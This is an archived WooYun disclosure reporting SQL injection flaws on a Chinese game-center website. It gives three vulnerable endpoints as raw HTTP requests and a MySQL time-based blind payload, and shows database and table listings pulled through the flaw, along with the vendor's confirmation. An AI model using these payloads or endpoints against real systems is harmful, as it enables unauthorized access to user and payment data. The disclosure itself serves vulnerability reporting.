当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117557

漏洞标题:嘟嘟牛游戏中心多处sql注入

相关厂商:嘟嘟牛

漏洞作者: 路人甲

提交时间:2015-06-01 18:18

修复时间:2015-07-17 11:44

公开时间:2015-07-17 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-02: 厂商已经确认,细节仅向厂商公开
2015-06-12: 细节向核心白帽子及相关领域专家公开
2015-06-22: 细节向普通白帽子公开
2015-07-02: 细节向实习白帽子公开
2015-07-17: 细节向公众公开

简要描述:

233

详细说明:

忙了一会,发现就有人提了,操心。
1,
POST /api/getUserBaDou.jsp?userDoDoid=* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.dodo178.com/
Cookie: JSESSIONID=E203CD9F5E3140922B5B7662BB21B0AC.dodo178b
Host: www.dodo178.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
2.
http://www.dodo178.com//front/recharge.jsp?account=null&gameid=32&srvid=*
3,
POST /front/rechargeAction.jsp?acc=0&account=*&bt=0&op=checkAccount HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.dodo178.com/
Cookie: JSESSIONID=E203CD9F5E3140922B5B7662BB21B0AC.dodo178b
Host: www.dodo178.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
payload参考:
userDoDoid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DzZP)

漏洞证明:

---
Parameter: userDoDoid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: userDoDoid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DzZP)
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] gamecenter
[*] information_schema
[*] test
Database: gamecenter
[52 tables]
+---------------------+
| Activities |
| AlternationPlay |
| Company |
| FaviconInfo |
| GW_Information |
| GW_Pocture |
| GW_Raider |
| GameAdConfigure |
| GameAdDefine |
| GameCsInfo |
| GameInfo |
| GameServerInfo |
| GameStatisticalData |
| Information |
| LEScore |
| MgCardInfo |
| MgGifts |
| MobileGame |
| NoviceCardInfo |
| OperateLog |
| Prize |
| PrizeDrawer |
| PrizeLog |
| PrizePlayer |
| QD_userRecharge |
| QP_Activity |
| QP_FindAward |
| QP_FindAwardLog |
| QP_UserFindAward |
| QP_UserPrize |
| QP_pics |
| QP_prizeInfo |
| REScore |
| Raider |
| Recharge |
| RedPackage |
| RedPackageRes |
| RegisterUser |
| Research |
| SeoSet |
| SerialNum |
| Spread |
| SystemConfig |
| Task |
| TaskParam |
| TaskParamValue |
| TaskRule |
| TaskRuleFinish |
| TaskUser |
| Temp_User |
| Tips |
| friendShipLink |
+---------------------+

修复方案:

~~~~~~~~~~~~~~~~~~~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-02 11:42

厂商回复:

感谢路人甲的关注,已安排研发人员修复并自查。

最新状态:

暂无